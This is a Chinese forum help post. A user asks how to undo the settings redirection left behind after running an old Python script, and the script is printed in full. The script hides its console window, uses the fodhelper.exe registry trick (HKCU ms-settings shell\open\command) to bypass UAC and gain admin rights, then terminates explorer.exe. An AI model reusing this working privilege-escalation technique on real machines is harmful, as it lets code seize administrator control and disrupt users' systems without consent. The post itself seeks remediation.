社区讨论
关于python有害代码的求助 玄关 违规紫衫
灌水区参与者 3已保存回复 4
讨论操作
快速查看讨论及其快照的属性,并进行相关操作。
- 当前回复
- 3 条
- 当前快照
- 1 份
- 快照标识符
- @lo9y0qck
- 此快照首次捕获于
- 2023/10/28 19:12 2 年前
- 此快照最后确认于
- 2023/10/28 19:30 2 年前
rt,本人闲着翻之前的python代码,然后随便运行了几个。但是运行到了这个:
PYTHONfrom __future__ import print_function
import sys
import os
import ctypes
import psutil
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
ctypes.windll.user32.ShowWindow(whnd,0)
ctypes.windll.kernel32.CloseHandle(whnd)
if sys.version_info[0] == 3:
import winreg as winreg
else:
import _winreg as winreg
import threading
import time
CMD = r"C:\Windows\System32\cmd.exe"
FOD_HELPER = r'C:\Windows\System32\fodhelper.exe'
PYTHON_CMD = "python"
REG_PATH = 'Software\Classes\ms-settings\shell\open\command'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'
'''
signal.signal(signal.SIGINT,no)
def no(signal,frame):
pass
'''
threads = []
def run():
for process in psutil.process_iter(attrs=['pid', 'name']):
try:
if process.info['name'] == 'explorer.exe':
pid = process.info['pid']
psutil.Process(pid).terminate()
except:
pass
def is_admin():
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
def create_reg_key(key, value):
try:
winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH)
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE)
winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)
winreg.CloseKey(registry_key)
except WindowsError:
raise
def bypass_uac(cmd):
try:
create_reg_key(DELEGATE_EXEC_REG_KEY, '')
create_reg_key(None, cmd)
except WindowsError:
raise
def execute():
if not is_admin():
current_dir = __file__
cmd = '{} /k {} {}'.format(CMD, PYTHON_CMD, current_dir)
bypass_uac(cmd)
os.system(FOD_HELPER)
sys.exit()
else:
run()
if __name__ == '__main__':
execute()
大概是隐藏主窗口,禁止ctrlc结束程序(被注释了),自动获得管理员权限,杀了explorer.exe。
这些都没问题,但是当我在桌面右键,选择个性化的时候,就会自动启动这个程序或cmd.exe,很多设置都被重定向(大概是这个意思吧?)到了它和cmd。如果把它删了,再在桌面右键,选择个性化,会跳出来cmd提示该文件不存在。
虽然说直接打开设置即可,但是很多软件都用不了了,问怎么解除这个重定向,玄关
回复
共 4 条回复,欢迎继续交流。
正在加载回复...